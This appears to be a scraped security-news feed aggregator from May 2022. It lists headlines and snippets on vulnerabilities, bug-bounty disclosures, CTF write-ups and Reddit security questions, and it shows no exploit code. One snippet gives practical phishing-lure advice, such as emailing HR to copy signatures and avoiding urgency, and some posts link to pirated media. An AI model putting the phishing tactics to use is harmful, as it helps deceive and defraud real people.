    FreeBuf早报 | DNS高危漏洞影响百万物联网设备;Deepfakes对网安全的威胁增大
    uClibc库的域名系统 (DNS) 组件中存在一个高危漏洞,全球数百万台使用uClibc库的物联网设备都也将受到影响。
    设备接管风险警告!F5发现一个关键BIG-IP远程执行漏洞
    近日,应用交付领域(ADN)全球领导者F5公司发布了一项安全警告,其研究团队监测到一个关键漏洞正在被积极利用。
    “8220”挖矿组织活动分析
    “8220”是一个长期活跃并且擅长使用漏洞进行攻击并部署挖矿程序的组织。
    死灰复燃!新型REvil勒索软件在野攻击活动分析
    2022年1月俄罗斯FSB称在美国提供的相关信息后他们彻底毁灭了REvil并抓捕了几名人员。
    DNS曝高危漏洞,影响数百万物联网设备
    通过该漏洞,攻击者可以进行DNS中毒或DNS欺骗攻击,并将受害者重定向到恶意网站而不是合法网站。
    攻击者劫持英国NHS电子邮件帐户以窃取Microsoft登录信息
    据调查,在近半年的时间里,英国国家卫生系统(NHS)的100多名员工的工作电子邮件帐户被多次用于网络钓鱼活动,其中一些活动旨在窃取Microsoft登录信息。在劫持合法的NHS电子邮件帐户后,这些攻击者于去年10月开始使用它们,并至少在今年4月之前将其继续用于网络钓鱼活动。据电子邮件安全INKY的研究人员称,已经从英格兰和苏格兰员工的NHS电子邮件帐户发送出1000多条网络钓鱼邮件。研究人员跟踪了
    攻击者部署后门,窃取Exchange电子邮件
    某 APT 组织入侵企业网络,并试图窃取参与企业交易员工的Exchange电子邮件。
    GitHub:2023年底前所有用户账户需启用双因素身份验证
    5月4日,GitHub 宣布,所有上传代码的开发者及用户账户必须在2023年底前启用一种或多种形式的双因素身份验证 (2FA)。
  • Open

    Github Account Takeover which is used as gradle vcs in "github.com/palantir/gradle-launch-config-plugin"
    Palantir Public disclosed a bug submitted by codermak: https://hackerone.com/reports/1525578 - Bounty: $250
  • Open

    LoNg4j: New Log4j Vulnerability
    Article URL: https://www.cequence.ai/blog/long4j/ Comments URL: https://news.ycombinator.com/item?id=31273048 Points: 4 # Comments: 0
  • Open

    I am starting college, should I start with binary exploitation or web app exploitation, to get jobs and internships? though I do love binary exploitation but not many jobs in ireland
    submitted by /u/Traditional-Cloud-80 [link] [comments]
    which target to pick after learning basics of binary exploitation? if there is any bug bounty ? sorry if it's lame question
    submitted by /u/Traditional-Cloud-80 [link] [comments]
    QUESTION
    Hello,everyone. First of all, I want to apologize for my nooby question For a while I've been reading about exploit development. since this field is incredibly interesting to me anyway, i came across a video called "The Layman's Guide to Zero-Day Engineering" on youtube ( i wanted to put the link but idk if it's allowed) and I was fascinated by the way they developed the exploit for the safari browser so i was wondering if exploit developers know every language ??? i tried to google my question but i didn't found an answer Do professionals have to know the programming language to be able to code the exploit? For example, when you write an exploit for (Linux) C you have to know c, but let's say, for example, you want to code an exploit for JIT or V8. Do you learn JavaScript or do you apply the same knowledge to every exploit regarding the language ? TL;DR ( is exploit development independent of language? ) . Thank you everyone submitted by /u/IBK_0 [link] [comments]
  • Open

    从 PWN2OWN CVE-2022-27666 看内核页风水
    作者: f-undefined团队 v1n3gar 原文链接:https://mp.weixin.qq.com/s/JPbwYA2sS9jCMMgwBxONjg 知识点: (1)使用 msg_msg 构造任意写来篡改 modprobe_path,通过 FUSE 来处理页错误(克服5.11版本之后用户没有userfaultfd权限的问题,肯定有一大波CTF题将要效仿)。 (2)由于漏洞对象位于...
    CVE-2022-21882 Win32k 内核提权漏洞深入分析
    作者:天融信阿尔法实验室 原文链接:https://mp.weixin.qq.com/s/0aDmaEMXae1_tJXFZVdi6Q CVE-2022-21882漏洞是Windows系统的一个本地提权漏洞,微软在2022年1月份安全更新中修补此漏洞。本文章对漏洞成因及利用程序进行了详细的分析。 1.漏洞介绍 CVE-2022-21882是对CVE-2021-1732漏洞的绕过,属于win3...
  • Open

    从 PWN2OWN CVE-2022-27666 看内核页风水
    作者: f-undefined团队 v1n3gar 原文链接:https://mp.weixin.qq.com/s/JPbwYA2sS9jCMMgwBxONjg 知识点: (1)使用 msg_msg 构造任意写来篡改 modprobe_path,通过 FUSE 来处理页错误(克服5.11版本之后用户没有userfaultfd权限的问题,肯定有一大波CTF题将要效仿)。 (2)由于漏洞对象位于...
    CVE-2022-21882 Win32k 内核提权漏洞深入分析
    作者:天融信阿尔法实验室 原文链接:https://mp.weixin.qq.com/s/0aDmaEMXae1_tJXFZVdi6Q CVE-2022-21882漏洞是Windows系统的一个本地提权漏洞,微软在2022年1月份安全更新中修补此漏洞。本文章对漏洞成因及利用程序进行了详细的分析。 1.漏洞介绍 CVE-2022-21882是对CVE-2021-1732漏洞的绕过,属于win3...

  • Open

    Hack To Learn: OSINT and Passive Reconnaissance
    Dear Friend, welcome to HaXeZ where I want to talk about Open-source intelligence and passive reconnaissance. Continue reading on System Weakness »
    War in Ukraine / May 3
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Something from the internet…
    Anonymous web browsing, chatting or just being online can be achieved by mixing different OS configurations such as Tails and Qubes OS… Continue reading on Medium »
    Keeber NahamCon CTF 2022 [OSINT]
    Keeber 1 Continue reading on Medium »
    NahamCon 2022 CTF — Keeber 1, 2, 3, 5
    As part of NahamCon 2022, a 48-hour CTF event was hosted leading up to security conference itself. Continue reading on Medium »
  • Open

    Clickjacking Vulnerability Can Leads To Delete Developer APP
    TikTok disclosed a bug submitted by rioncool22: https://hackerone.com/reports/1416612 - Bounty: $500
    One Click Account Hijacking via Unvalidated Deeplink
    TikTok disclosed a bug submitted by fr4via: https://hackerone.com/reports/1500614 - Bounty: $10000
    URL Scheme misconfiguration on TikTok for IOS
    TikTok disclosed a bug submitted by glassplant: https://hackerone.com/reports/1437294 - Bounty: $500
  • Open

    How i found a vulnerability that leads to access any users’ sensitive data and got $500
    Hello everyone! Continue reading on Medium »
    0-click RCE in Electron Applications
    0-click RCE in Electron Applications Continue reading on Medium »
    Business Logic Errors - Art of Testing Cards
    Summary : Continue reading on Medium »
    CVE-2022–25262
    CVE-2022–25262 Continue reading on Medium »
    Information leakage in EXIF data of images(EXIF Data Exposure)
    Summary : Continue reading on Medium »
    Hack the HAckers
    While reading my feeds I came across “hacking the hackers” Heading , so I think lets try finding bugs on THM ( Try HacK Me ) . Continue reading on Medium »
  • Open

    Block all user agents with modsecurity except one?
    I want to block all user agents from my server except for one specific user agent string. How would I create a rule(s) to do this? Thanks! submitted by /u/BelugaBilliam [link] [comments]
    Huawei Network device compliance audit
    Hello!! I am looking for some guidance on how to conduct CIS compliance scans for my Huawei network devices. I use a bunch of other tools such as tripwire, nexpose and some NSPMs for non-Huawei nodes but Huawei devices are not supported by anyone of them(atleast out of the box). Any guidance? Thanks. submitted by /u/Due-Brick6204 [link] [comments]
    Overcoming imposter syndrome very early on
    After getting some help desk experience I decided to apply to more security focused roles and have been given an interview as a security consultant. I am very nervous and because of this I am already considering whether I will be good enough. It will be the longest interviews I’ve done in my life (1hour+). I do not meet most of the desirable skills maybe about 3/5. How can I overcome this and how should I prepare well? I really want this role as I want to push myself. The interview will be held by a senior in the company so don’t want to say anything silly and completely mess up the interview submitted by /u/amvn92 [link] [comments]
    I fucked up and I don't know what to do, please, I need advice
    I recently started browsing r/hacking and I saw a video about a streaming site that started recently, the site was heavily publicized by a YouTuber for it's horrible UI, I visited it to see if the site was so ugly for real. I went to Google and searched for "test site online" and I found a website that let's you run a (not full) security check, just checks if the site is HTTPS and so on, I also found right after that one a site that said SQLMAP test. The site had just three options: A URL textbox A Submit button A Reset button I put the site there and the site had two popup were shown, the first site said: no major issues and the second one printed a log and a popup was shown "you must be authorized to use this on the site". I don't even fucking know what SQLMAP was before I looked for it after the popup came to the foreground. Am I going to jail? I had a panic attack and I cried one hour, I was just browsing my phone and I thought it was fun to see if the site was botched or not. I'm panicking, what's wrong with me submitted by /u/__subroutine__ [link] [comments]
  • Open

    Write Blocker
    What write blocker do you recommend using when creating a forensic image of a drive? submitted by /u/Beep-Boop-Bop-Boop [link] [comments]
    GCFA failed :( help required
    Hi guys recently failed my gcfa after getting around 60%. I think made a mistake of frequently referring index and books and at the end left out with 5 lab questions. Now I’m planning to re-appear for the exam. Anyone can guide me or any leads of what I’m missing or need to cater out? Thanks PS. Got above 75% in both practice exams submitted by /u/Mushroom-Fuzzy [link] [comments]
    GCFA Poster Question
    I will be taking my GCFA exam soon and was wondering which posters you printed out that were most helpful to you? Thank you submitted by /u/joe_dro [link] [comments]
  • Open

    Cyberwar In Ukraine Hackers Are Hacking Russia
    submitted by /u/cybersocdm [link] [comments]
    Hacking Power Plants and Industrial Control Systems
    submitted by /u/cybersocdm [link] [comments]
    Update on cyber activity in Eastern Europe
    submitted by /u/dmchell [link] [comments]
  • Open

    SecWiki News 2022-05-04 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-04 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    ELFLoader: Another In Memory Loader Post
    Intro Now that BOFs are commonplace for Windows agents, some people have talked about wanting a non-Windows only version. In this blog post, we’ve got something for you: the same thing but for Linux/Mac. The process of building in memory loaders are the same, no matter the file format type. In this case, we’ll just... The post ELFLoader: Another In Memory Loader Post appeared first on TrustedSec.
  • Open

    NahamCon 2022 CTF Write-up: “No Space Between Us” Challenge
    No content preview
    Rate Limiting attack bypassing invisible captcha
    No content preview
  • Open

    NahamCon 2022 CTF Write-up: “No Space Between Us” Challenge
    No content preview
    Rate Limiting attack bypassing invisible captcha
    No content preview
  • Open

    NahamCon 2022 CTF Write-up: “No Space Between Us” Challenge
    No content preview
    Rate Limiting attack bypassing invisible captcha
    No content preview
  • Open

    Big Collection For Anime Fans
    15TB of anime (series-movies) https://drive.google.com/drive/folders/1vSdJo_OrJNgVIRYsvTwR-PeLyM8L-V0M submitted by /u/NELARO [link] [comments]
  • Open

    Shady economics of proxy services
    submitted by /u/rushter_ [link] [comments]
    Authenticating with certificates when PKINIT is not supported
    submitted by /u/the-useless-one [link] [comments]
    Themes from Real World Crypto 2022
    submitted by /u/yossarian_flew_away [link] [comments]
    Exploiting Dynamic Linking Procedure In x64 ELF Binaries
    submitted by /u/paran0ide [link] [comments]
  • Open

    0-click RCE in Electron Applications
    0-click RCE in Electron Applications Continue reading on Medium »
  • Open

    FreeBuf早报 | 普京下令各部门机构设立IT安全部门;亲乌黑客对俄网站进行 DDoS 攻击
    普京签署确保俄罗斯信息安全额外措施的总统令,下令在每个部门、机构和骨干组织里设立IT安全部门。
  • Open

    Critical vulnerability in the Matrix IRC bridge
    Article URL: https://matrix.org/blog/2022/05/04/0-34-0-security-release-for-matrix-appservice-irc-high-severity/ Comments URL: https://news.ycombinator.com/item?id=31257915 Points: 91 # Comments: 13
  • Open

    Putting It All Together
    It's great when a plan, or a puzzle, comes together, isn't it?  I'm not just channeling my inner Hannibal Smith...I'm talking about bringing various pieces or elements together to build a cohesive, clear picture, connecting the dots into a cohesive analysis. To kick this off, Florian had this to say about threat actors moving to using ISO/IMG files as result of Microsoft disabling VBA macros in docs downloaded from the Internet, a change which results in entirely new artifact constellations. After all, a change in TTPs is going to result in changes as to how the system is impacted, and a change in the resultant constellations. So, this sets the stage for our example. In this case, the first piece of the puzzle is this tweet from Max_Mal_, which points to the BumbleBee campaign (more info f…

  • Open

    Master or Certs
    Hey Everyone, I am graduating in August with my Bachelor’s in Computer Forensics/Digital Investigations. Is it better to stay and get my Masters or graduate with a Bachelors and work on getting some certificates? Thanks! submitted by /u/chungusXL316 [link] [comments]
    Advanced Persistent Threat (APT) Malware Samples and Research Papers Collection
    submitted by /u/cybersocdm [link] [comments]
  • Open

    Useful Security Tools and Resources for Digital Forensics
    submitted by /u/Khaotic_Kernel [link] [comments]
    Nozomi Networks Discovers Unpatched DNS Bug in Popular C Standard Library Putting IoT at Risk
    submitted by /u/39816561 [link] [comments]
    Privilege escalation vulnerabilities discovered in Linux known as Nimbuspwn
    submitted by /u/sciencestudent99 [link] [comments]
    New update from Google's Threat Analysis Group finds numerous APTs running campaigns in Ukraine and Est. Europe, including Fancy Bear (Russia), Ghostwriter (Belarus) and Curious Gorge (China).
    submitted by /u/Ramsey_Power [link] [comments]
    Compromising Read-Only Containers with Fileless Malware
    submitted by /u/MiguelHzBz [link] [comments]
    AvosLocker Ransomware Variant Abuses Avast Anti-Rootkit Driver File to Disable Anti-Virus
    submitted by /u/campuscodi [link] [comments]
    Zyxel firmware extraction and password analysis
    submitted by /u/0xdea [link] [comments]
    Hacking a Bank by Finding a 0day in dotCMS
    submitted by /u/Mempodipper [link] [comments]
    DOing Harm
    submitted by /u/netsecfriends [link] [comments]
  • Open

    Can someone find me by my Bluetooth address knowing only my phone number?
    I’m a bit confused and shocked about what happened. TD;LR: Someone sent me a message on WhatsApp saying are you at this coffee shop? And yes I was Here is the story: I’m a freelancer and I took a gig from someone who I have never met. I added his number on my phone to my contacts and we been texting on WhatsApp regrading the gig. That was in 2019 and the gig lasted for about a couple months. Fast forward 2022 a few days ago, I was at a coffee shop and I got a text on WhatsApp from that person asking me if I’m at that same coffee shop! I told him yes but how did you know? He said “I turned on my Bluetooth to connect to my headphones and it showed me that “my name” is nearby” (the name he saved on his contacts) Some facts: -That person never heard my voice -He does not know how I look like -I have an iPhone (idk what phone he has) -my Bluetooth name is “iPhone” (not unique) I’m mind blown how did that happen and if he is actually telling the truth? Does WhatsApp maps my Bluetooth address to my phone number somehow? (Or maybe a different app) I know it’s theoretically possible but as far as I know, Apple iOS does not allow that kind of mapping submitted by /u/i_R7AL [link] [comments]
    Not able to connect with DNS server
    Hi all, I have a problem with my laptop since two days ago which basically is that I can't use any browser because a message appears saying "We have problems to find that site" and then it says, "We can't connect to (Website searched)". I've tried some things like resetting the DNS cache, also resetting the router and more possible solutions I found on the internet, but none of them worked. I use Mozilla Firefox and it does have this problem, and tried with Google Chrome and Microsoft Edge and also have the same problem. The curious thing is that I can use Tor Browser without any problem and make the daily use if it. I also used the problem solving system from the computer and executed it to find any problem with the internet connections, after that the problem is that the DNS server is not responding, but also says that it is a problem that can't be solved automatically by the system. Also, I tried to scan my computer with the Avast antivirus program and the computer is not able to open it so I can't scan in case there is any virus or malware. I used the Microsoft scan that comes with the system and it says that there is no virus or malware found. I also just saw that some apps like Steam or Netflix are not working because are also not recieving signal from the DNS server I suppose and for that reason don't have internet. Thank you for reading and for trying to figure out a solution, I need my laptop running as always for school work and projects so every help you can give me would be great. submitted by /u/12d12g [link] [comments]
    Introducing security processes in a company from the ground-up
    Hey all, Recently, I had a discussion with one of my colleagues about introducing some security processes in our organization. It has been in the pipeline for some time now but and we figured that we should probably start working on it while the company is not that big. Plus, we started seeing some occasional DDoS attacks recently (nothing too mayor or disruptive, but enough to bring up some alarms). What I am curious about is: How would you tackle this problem? How would you prioritize tasks that should be done? How would you get non-tech people onboard to follow those best practices? What are some technical solutions that come to mind? To put some context to all of the above: the company doesnt hold any sensitive data (medical records, financial records or credit card numbers), although, I would like to hear your opinion on those as well. We are an e-learning platform with some significant user base and people do follow some obvious best practices, like: using password managers, using 2FA (not enforcing it though, but we should), giving access to resources only to people that really need them to perform their job, doing frequent backups, etc. I am a dev with some nice and broad experience in the field. Even tho I can navigate myself around IT concepts and security, I've never actually worked in a role and I dont really know where to start, so any help is much appreciated. :) submitted by /u/d_lipovac [link] [comments]
    Insecure Request Practice
    Hi guys ! I saw a practice one of these days which involved adding user and password to the headers of a request and encoding them with base64. Is this actually correct? if not what would be the best way to fix it? I feel like that way of doing it is quite insecure submitted by /u/Mokushi99 [link] [comments]
    Block legacy protocols for Microsoft applications
    Hi there. I want to block all the old protocols, but I'm afraid that this could lead to availability risks for some applications. Right now I see that only one application Office 365 Exchange Online is using legacy protocols: IMAP Exchange Web Services SMTP Exchange ActiveSync MAPI Over HTTP Offline Address Book Autodiscover Exchange Online Powershell POP How to understand whether there will be risks in the usage of Office 365 Exchange Online if I will block legacy protocols? https://docs.microsoft.com/en-us/azure/active-directory/conditional-access/block-legacy-authentication submitted by /u/athanielx [link] [comments]
  • Open

    Etcd Integrates Continuous Fuzzing
    Article URL: https://www.cncf.io/blog/2022/04/13/etcd-integrates-continuous-fuzzing/ Comments URL: https://news.ycombinator.com/item?id=31254099 Points: 1 # Comments: 0
    Fuzzing Like a Caveman
    Article URL: https://h0mbre.github.io/Fuzzing-Like-A-Caveman/ Comments URL: https://news.ycombinator.com/item?id=31249559 Points: 2 # Comments: 0
    Advanced Go Fuzzing Techniques
    Article URL: https://blog.fuzzbuzz.io/writing-effective-go-fuzz-tests/ Comments URL: https://news.ycombinator.com/item?id=31249130 Points: 3 # Comments: 1
  • Open

    Ni Macron, ni Le Pen
    France election results and the country’s political void Continue reading on Medium »
    War in Ukraine / May 2
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Free applications and services for security specialist…
    Let’s talk about those free applications and services that a security specialist should definitely put on a smartphone and computer. First… Continue reading on Medium »
    Maltego Transforms List
    A list of tools that handle different data and make it usable in Maltego. Continue reading on Medium »
    Information gathering from instagram accounts
    hellow guys my name is arshia and im comming with another interesting tutorial and in this tutorial you will learn how to gather… Continue reading on Medium »
  • Open

    How I got a lousyT-Shirt from the Dutch Goverment.
    Hello everyone,  my name is Max. I’m a Computer Science student and ethical hacker from Germany. Today I want to tell you how I hacked the… Continue reading on Medium »
    Denial of Service through …
    Today let us learn about Denial of service Continue reading on Medium »
    A Guide For Advanced Message Protected API Hacking Using Hackvertor and Burp (part 2)
    More up-to-date Hackvertor game-changer techniques, code examples, and tips for advanced API penetration testing and bug bounty. Continue reading on Medium »
    Open Redirect Vulnerability
    We’ll begin our discussion with open redirect vulnerabilities, which occur when a target visits a website and that website sends their… Continue reading on Medium »
    NahamCon CTF 2022 — Web Exploitation — All Challenges — Writeup
    Flaskmetal Alchemist ( Medium) Continue reading on Medium »
  • Open

    Apple Silicon Exclusively Hit with World-First “Augury” DMP Vulnerability
    Article URL: https://www.tomshardware.com/news/apple-silicon-exclusively-hit-with-world-first-augury-dmp-vulnerability Comments URL: https://news.ycombinator.com/item?id=31252031 Points: 2 # Comments: 0
    Responsible Disclosure: 6000 Vulnerability Submissions Later
    Article URL: https://www.danielmakelley.com/responsible-disclosure-6-000-vulnerability-submissions/ Comments URL: https://news.ycombinator.com/item?id=31251551 Points: 3 # Comments: 0
    Vuls: Agent-less vulnerability scanner for Linux, FreeBSD
    Article URL: https://github.com/future-architect/vuls Comments URL: https://news.ycombinator.com/item?id=31250171 Points: 18 # Comments: 1
  • Open

    SecWiki News 2022-05-03 Review
    如何写科研论文? by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-03 Review
    如何写科研论文? by ourren 更多最新文章,请访问SecWiki
  • Open

    The ABCs of Kerberoasting
    Introduction Continue reading on InfoSec Write-ups »
    Shibboleth from HackTheBox — Detailed Walkthrough
    No content preview
    THM Writeup: Ra
    No content preview
  • Open

    The ABCs of Kerberoasting
    Introduction Continue reading on InfoSec Write-ups »
    Shibboleth from HackTheBox — Detailed Walkthrough
    No content preview
    THM Writeup: Ra
    No content preview
  • Open

    The ABCs of Kerberoasting
    Introduction Continue reading on InfoSec Write-ups »
    Shibboleth from HackTheBox — Detailed Walkthrough
    No content preview
    THM Writeup: Ra
    No content preview
  • Open

    WooCommerce Credit Card Skimmers Concealed In Fake Images
    Our research and remediation teams have noticed an increase in WooCommerce credit card skimmers on client sites over the past few years, as detailed in past blog posts. Due to the increased number of plugins and components facilitating online payments and its ease of use, WordPress has become a common e-commerce platform — and the frequency in which the popular CMS is being targeted by attackers aiming to steal sensitive personal information and credit card details is also accelerating. Continue reading WooCommerce Credit Card Skimmers Concealed In Fake Images at Sucuri Blog.
  • Open

    ZAP HTTP Sessions를 통해 간편하게 세션 기반 테스팅하기
    ZAP에는 HTTP Sessions라는 기능이 있습니다. 이름과 옵션에 있는 내용을 보고 세션 처리 관련된 기능이구나 생각만 했지 실제로 한번도 사용해보지 않았던 기능입니다. 오늘 놓친 기능이 있을까 싶어서 메뉴를 돌아다니던 중 발견하여 테스트해봤는데 생각보다 테스팅의 불편함을 줄여줄 수 있는 부분으로 보여서 글로 소개해드리려고 합니다 :D HTTP Sessions HTTP Session는 이름 그래도 HTTP에서 사용하는 Session을 ZAP이 자동으로 인지하고, 이를 기반으로 다른 액션에서 사용할 수 있도록 제공하는 기능입니다. 단순히 말로만 설명하면 감이 잘 안올텐데요, 아래 순서로 한번 어떤식으로 사용하는지 보면서 이야기해보죠.
  • Open

    Blind XSS via Feedback form.
    Judge.me disclosed a bug submitted by b3hlull: https://hackerone.com/reports/1339034 - Bounty: $1250
    Self-DoS due to template injection via email field in password reset form on access.acronis.com
    Acronis disclosed a bug submitted by sudo_bash: https://hackerone.com/reports/1265344
  • Open

    How to conduct VAPT?
    How to conduct a VAPT? Continue reading on Medium »

  • Open

    HTB[CTF]: Lame [Easy]
    Vamos iniciar nossa CTF realizando o reconhecimento do ambiente na qual iremos enfrentar… Partiremos pela varredura de portas: Continue reading on Medium »
    HTB[CTF]: Pennyworth [Easy]
    Vamos iniciar realizando uma varredura de portas básica em nosso alvo, vou utilizar o nmap para isso. Continue reading on Medium »
    Fun with DLL’s — Part 1 — DLL Search Order Hijacking
    This post is part of a new series I’m starting titled “Fun with DLL’s” where I will dive into the specifics of Windows DLLs. In this… Continue reading on Medium »
    Red Team Powershell Scripts
    Various PowerShell scripts that may be useful during red team exercise Continue reading on Medium »
  • Open

    My iPhone is making calls to kozow.com
    Should I be worried? From my research it is a c2 of some malware. Any advice or check? submitted by /u/punto2019 [link] [comments]
    Is there a simple way to easily verify which download link on a site ( with multiple 'download buttons' ) is the correct one ?
    Cheers! submitted by /u/Unusual-Resolve-7521 [link] [comments]
  • Open

    Passed my GSEC!
    Passed my GSEC with an 84 today, not as high as I was hoping but comfortably in the middle. Overall I am happy with the experience! My job gets vouchers for SANS every year so which course should I pursue next if I can get a voucher? For context I work Cyber Threat Analysis and Passive/Active Network Analysis. Currently have GNFA as my only other cert. submitted by /u/Johnsonwilliam977 [link] [comments]
  • Open

    UNC3524: Eye Spy on Your Email
    submitted by /u/mattjayy [link] [comments]
    How masscan works
    submitted by /u/rushter_ [link] [comments]
    Augury Augury: Using Data Memory-Dependent Prefetchers to Leak Data at Rest (on Apple M1 and similar)
    submitted by /u/nicuramar [link] [comments]
    AWS Targeted by a Package Backfill Attack
    submitted by /u/viagas472 [link] [comments]
  • Open

    He110 W0r1d
    My dear digital natives, developer, hackers and programmers… It’s nice to meet everyone of you! Continue reading on Medium »
    War in Ukraine / May 1
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    NahamCon Capture The Flag 2022 [Versi Indonesia]
    Perlu diketahui bahwa Write Up ini hanya berfokus pada challenge yang berkategori Open Source Intelligence (OSINT) pada NahamCon CTF 2022 Continue reading on Medium »
    Making an untraceable smartphone…
    Let’s talk about… anonymity. Today we will talk about the security of our mobile phones. Let’s start with hadware… Continue reading on Medium »
  • Open

    North Korean books and pictures, my guess is that it's run by some Jucheist in the west trying to share around DPRK propaganda, interesting to look through and might be helpful if you're curious about reading books from NK and don't know where to look
    submitted by /u/subwaytech [link] [comments]
    Some Games
    http://ashamanecore.com/dicpics/Games/ submitted by /u/Madman3001 [link] [comments]
    A Google drive folder with movies, books, audiobooks and shows
    [ Removed by reddit in response to a copyright notice. ] submitted by /u/EpikDuckiee [link] [comments]
    a bunch of files about military boats (mostly pictures)
    submitted by /u/subwaytech [link] [comments]
  • Open

    SecWiki News 2022-05-02 Review
    SecWiki周刊(第426期) by ourren Python Cookbook 第三版 中文版 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-02 Review
    SecWiki周刊(第426期) by ourren Python Cookbook 第三版 中文版 by ourren 更多最新文章,请访问SecWiki
  • Open

    Reflected XSS Vulnerability leads to Credential Stealing worth $100
    Hi! This is Rian with my very first bug bounty write-up. Continue reading on Medium »
    An Bug Bounty Hunter’s Guide to IDOR Vulnerabilities
    How to find, exploit, and prevent insecure direct object references Continue reading on Medium »
  • Open

    Breakout from the Seccomp Unconfined Container
    submitted by /u/tbhaxor [link] [comments]
    Advanced Persistent Threat (APT) Malware Samples and Research Papers Collection
    submitted by /u/cybersocdm [link] [comments]
  • Open

    g_CiOptions in a Virtualized World
    With the leaking of code signing certificates and exploits for vulnerable drivers becoming common occurrences, adversaries are adopting the kernel as their new playground. And with Microsoft making technologies like Virtualization Based Security (VBS) and Hypervisor Code Integrity (HVCI) available, I wanted to take some time to understand just how vulnerable endpoints are when faced... The post g_CiOptions in a Virtualized World appeared first on TrustedSec.
  • Open

    BPF 进阶笔记(四):调试 BPF 程序
    本文是阅读一些 BPF 高级教程时所作的笔记。 关于 “BPF 进阶笔记” 系列 平时学习和使用 BPF 时所整理。由于是笔记而非教程,因此内容不会追求连贯,有基础的 同学可作查漏补缺之用。 文中涉及的代码,如无特殊说明,均基于内核 5.10 版本。 BPF 进阶笔记(一):BPF 程序(BPF Prog)类型详解:使用场景、函数签名、执行位置及程序示例 BPF 进阶笔记(二):BPF Map 类型详解:使用场景、程序示例 BPF 进阶笔记(三):BPF Map 内核实现 BPF 进阶笔记(四):调试 BPF 程序 关于 “BPF 进阶笔记” 系列 1 打印日志 1.1 日志路径及格式 1.2 bpf_printk():kernel 5.2+ 使用方式 使用限制 内核实现 1.3 bpf_trace_printk() 使用方式 使用限制 内核实现 2 用 BPF 程序 trace 另一个 BPF 程序(BPF trampoline) 2.1 使用场景 2.2 依赖:kernel 5.5+ 3 设置断点,单步调试 3.1 bpf_dbg(仅限 cBPF) 1 打印日志 1.1 日志路径及格式 本节将介绍的几种打印日志方式最终都会输出到 debugfs 路径 /sys/kernel/debug/tracing/trace: $ sudo tail /sys/kernel/debug/tracing/trace # 字段说明 - telnet-470 [001] .N.. 419421.045894: 0x000…

  • Open

    (XSS) Account takeover using Steam
    This story begins a couple of years ago. I was navigating through a gambling website (which I cannot disclose) when I decided I would… Continue reading on Medium »
    Exploiting IRCTC along with few other government domains through XXE
    In this blog I would be giving an Insight about XXE(XML External Entity) injection and a practical attack case study where I did… Continue reading on System Weakness »
    Exploiting IRCTC along with few other government domains through XXE
    In this blog I would be giving an Insight about XXE(XML External Entity) injection and a practical attack case study where I did… Continue reading on Medium »
    AlbusSec:- Penetration-List 06 SQL Injection (SQLi) — Part 2
    Hello Cybersecurity folk, I hope that you liked the previous article, so here you’ll learn about basic things about SQLi, Today’s article… Continue reading on Medium »
    Active VS Passive Reconnaissance
    Just like many other cybersecurity terms, “Reconnaissance” also derives from the military jargon. Continue reading on Bug Zero »
  • Open

    普京签署总统令:立即成立IT安全部门,禁用不友好国家信息安全设备
    现任俄罗斯总统普京正式签署了一份确保俄罗斯信息安全额外措施的总统令,下令俄罗斯所有部门、机构和骨干组织都需要设立IT安全部门。
  • Open

    XSS at http://nextapps.mtnonline.com/search/suggest/q/{xss payload}
    MTN Group disclosed a bug submitted by homosec: https://hackerone.com/reports/1244722
    XSS at videostore.mtnonline.com/GL/*.aspx via all parameters
    MTN Group disclosed a bug submitted by homosec: https://hackerone.com/reports/1244731
    Enumerate class codes via yahoo dork - Can access any course under teacher - Sensitive information leaked
    Khan Academy disclosed a bug submitted by bughunterpol: https://hackerone.com/reports/1514356
  • Open

    Feedback Welcome
    Phishing Tips Avoid the classics Urgent Problem to fix (unpaid invoice, hotel bill, acct. compromise). Making the request too important or urgent raises suspicion and decreases the odds of user compliance since these tactics are hammered in modern Security Awareness training (yes, people will still click, but not as many). Embrace Subtlety and Play Hard to Get Signature format, company fonts, colors, match everything up to build trust levels E-mail HR or someone else from company with a normal question, wait for their reply, then collect above items Emotions without Urgency Normalcy and trust must be intertwined with the emotion you choose to target (RARELY make specific requests in the message body, remember that if they're interested they're going to cli…
    Linux Privilege Escalation (Series)
    submitted by /u/tbhaxor [link] [comments]
  • Open

    War in Ukraine / April 30
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Online Tools For OSINT
    A collection of several hundred online tools for OSINT Continue reading on Medium »
    MAC-address OSINT
    I propose to study the sources intended for the study of the MAC address. MAC or Media Access Control is a unique combination of numbers… Continue reading on Medium »
    SPY NEWS: Week 17
    Summary of the espionage-related news stories for the Week 17 (24–30 April) of 2022. Continue reading on Medium »
  • Open

    Is it wrong for GitHub to host hacking tools?
    The culture of most mainstream cyber sec forums / portals is "do no harm". Most forum members will thankfully not co-operate if they suspect their advice will be used for nefarious purposes. However, this culture of keeping things clean is slightly subverted by GitHub who seem to have some very potent hacking tools on their site. Yet, I rarely hear the media or other internet commentators lambast them in the same way that Walmart gets criticised for selling arms. Any thoughts on this? submitted by /u/astillero [link] [comments]
  • Open

    SecWiki News 2022-05-01 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-01 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    [Cullinan #33] Add PP/IDOR/Type Juggling and SAML Injection 🪁
    Cullinan 로그 #33입니다. Prototype Pollution, IDOR, Type Juggling 그리고 SAML Injection 항목을 새로 추가했습니다. 그리고 SSRF에 SSRF Chains 관련 부분 추가했습니다. New Prototype Pollution IDOR Type Juggling SAML Injection Update Blind SSRF Canaries in SSRF 여담으로 Prototype Pollution은 정리하고 글을 올리고 얼마 안되서 Intigriti XSS Challenge 0422에 나와서 핵심 주제로 Prototype Pollution이 나와서 삽질을 덜 했던 기억이 있네요! 정말 타이밍이 좋았습니다 :D
  • Open

    Vulnerabilities that shook the internet
    Introduction Continue reading on InfoSec Write-ups »
    NahamCon CTF 2022 Write-up: Click Me! Android challenge
    No content preview
    TryHackMe — Content Discovery
    No content preview
  • Open

    Vulnerabilities that shook the internet
